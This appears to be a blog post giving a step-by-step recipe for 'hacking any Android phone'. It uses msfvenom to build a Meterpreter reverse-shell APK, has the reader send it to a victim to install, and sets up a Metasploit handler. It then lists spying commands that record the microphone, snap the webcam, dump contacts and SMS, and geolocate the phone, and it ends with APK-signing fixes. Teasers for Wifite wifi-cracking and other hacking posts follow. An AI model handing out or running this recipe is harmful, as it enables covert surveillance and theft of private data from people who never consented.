Skip to main content

Hacking any Android Phone : MSFVenon - Metasploit Playload Generator.

STEPS :

1. Fire Up kali and open command terminal.

2. Set payload and create custom windows executable.
Command:

root@kali:-# msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.110 LPORT=4444 R > andro.apk
(To know your LHOST, open new terminal and type ifconfig )

Your apk file is being saved in the Home folder.

Note: Don't add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).

3. Transfer/mail this file (here andro.apk) file to the victim's phone and install it.

4. Start the metasploit framework console as follows :
          
Command:
root@kali:-# msfconsole

5. Now it's time to open and setup multi-handler. Follows the steps :
msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
        Payload Handler is being started........

6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.

7. Try the following exploit commands :
    - record_mic
    - webcam_snap
    - webcam_stream
    - dump_contacts
    - dump_sms
    - geolocate
************************************************************************
Error fixing(incase you get PARSE ERROR)

Two methods:

1)Type command "d2j-apk-sign andro.apk
                                               
                                               or

 2) To fix this error download signapk - Click here to download

Steps to follow

  1. Open Signapk folder then open cmd.
  2. Copy the andro.apk(the app you made) in Signapk folder.
  3. Type java -" jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk "in cmd(not double quotes).
  4. copy it in your phone and install it.
Hope this works... :)

Comments

Post a Comment

Popular posts from this blog

These are the precautions you have to take, When your E-MAIL has been Hacked.

It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out by suggesting some of the steps that you need to take as soon as you realize that your  email account is hacked . Here is a list of steps and procedures that you need to follow in order to initiate the password recovery process: Steps to Recover Gmail Password: It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try: Step-1:  Try resetting your password! This is the fir...
Post a Comment
Read more

The 20 Most Popular Hacking Tools for "Kali Linux"

Top 20 Most Popular Hacking Tools for "Kali Linux". I n the world of cyber security, there are many tools available on the internet, many of them are free and others are paid. 1.  Aircrack-ng Aircrack-ng.org is an 802.11 WEP and WPA-PSK keys breaking program that can resolve keys once enough information regarding the term stolen. It executes the standard FMS attack alongside a few improvements like KoreK breachand additionally the all-new PTW attack, in this way making the assault much quicker contrasted with other WEP splitting devices. Actually, Aircrack-ng is an arrangement of software for evaluating remote systems. 2.  sqlmap sqlmap is an open source infiltration testing device that robotized the procedure of recognizing and abusing SQL infusion imperfections and assuming control of database servers. Full support for  MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB  data...
Post a Comment
Read more

Wifite : Hacking Wifi the easy way : Kali Linux.

Wifite While the aircrack-ng suite is a well known name in the wireless hacking , the same can't be said about Wifite. Living in the shade of the greatness of established aircrack-ng suite, Wifite has finally made a mark in a field where aircrack-ng failed. It made wifi hacking everyone's piece of cake. While all its features are not independent (eg. it  hacks WPS using reaver ), it does what it promises, and puts hacking on autopilot. I'm listing some features, before I tell you how to use wifite (which I don't think is necessary at all, as anyone who can understand simple English instructions given by Wifite can use it on his own).   Features Of Wifite Sorts targets by signal strength (in dB); cracks closest access points first Automatically de-authenticates clients of hidden networks to reveal SSIDs Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc) Customizable settings (timeouts, packets/se...
Post a Comment
Read more